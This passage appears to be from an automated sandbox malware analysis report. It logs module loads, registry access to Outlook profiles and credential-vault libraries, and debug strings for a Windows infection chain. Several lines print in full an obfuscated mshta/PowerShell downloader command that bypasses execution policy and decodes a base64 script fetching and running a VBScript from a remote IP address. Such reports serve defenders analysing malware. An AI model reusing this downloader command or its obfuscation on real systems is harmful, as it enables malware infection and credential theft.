                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2201321954.00000000079FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2472760067.0000
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ieUnAtt.pdbGCTL source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4512336904.0000000000DFE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: ieUnAtt.pdb source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.pdb source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.000000000479C000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002EF7C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2F